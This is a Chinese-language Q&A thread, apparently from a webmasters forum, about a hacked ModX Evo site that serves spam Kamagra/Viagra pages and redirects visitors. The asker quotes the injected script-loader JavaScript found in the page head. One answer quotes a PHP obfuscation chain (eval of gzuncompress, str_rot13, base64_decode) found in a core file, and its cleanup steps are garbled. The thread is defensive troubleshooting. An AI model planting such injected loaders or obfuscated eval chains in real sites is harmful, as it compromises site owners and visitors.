我有一个网站,似乎和工作良好。
然而,如果你在谷歌上搜索它,还会出现很多其他链接,例如:
mysite.com/kamagra-viagra.html
点击这个,我会被重定向到Kamagra站点。
我已经扫描了我的网站病毒和找不到任何东西。
我正在使用ModX Evo。
有人能建议我应该找的一个特定的文件导致这种情况吗?
编辑:
我注意到我的头上有一些奇怪的Javascript:
<script type="text/javascript" src="http://www.mysite.com/home.html?getjs=metric.js"></script>
<script type="text/javascript">var j1s = document.createElement('script');j1s.type = 'text/javascript';j1s.src = 'http://www.mysite.com/home.html?getjs=metric.js?getjs=metric.js';var h1ead = document.getElementsByTagName('head')[0];h1ead.appendChild(j1s);</script>
这不是在我的模板文件中,而是在加载页面时出现的。我怀疑这就是问题所在。
发布于 2014-01-29 05:24:35
有无数的可能性。您的.htaccess文件可能会受到破坏,并且正在对重定向语句进行评估以将用户发送出去,但这是一个相当直截了当的攻击,很容易找到和修复。
更有可能的情况是,您的CMS核心文件中有一个或多个已经注入了模糊代码,这段代码在每次访问时都会运行,从而生成用于Googlebot消费的垃圾链接,并注入一个JavaScript来将用户发送出去。这里的诀窍是找出哪些文件被修改了,攻击者是如何获得访问权限的,这个过程对于非安全培训人员来说是非常困难的。
还有一种可能性是,包含站点内容的数据库已被破坏,恶意代码也被注入其中。如果您没有对内容进行适当的安全备份,这可能对站点造成致命的影响。
无论如何,仔细阅读上述场景会产生两个基本问题:
最明显的跟进是“我该怎么解决它?”
除非您有很多诊断和修复安全问题的经验,否则您可能希望将此留给专业人员处理。有顾问将这样做,以及基于订阅的服务,如停止黑客或Sucuri。
发布于 2016-01-14 10:34:44
这是一次黑客攻击,似乎已经破坏了几个MODx Evo过时的安装。我刚修好了,这是我需要做的:
@eval(@gzuncompress(@str_rot13(@base64_decode(
(我发现它在文件底部附近) str_rot13
找到了它。https://webmasters.stackexchange.com/questions/57606
复制相似问题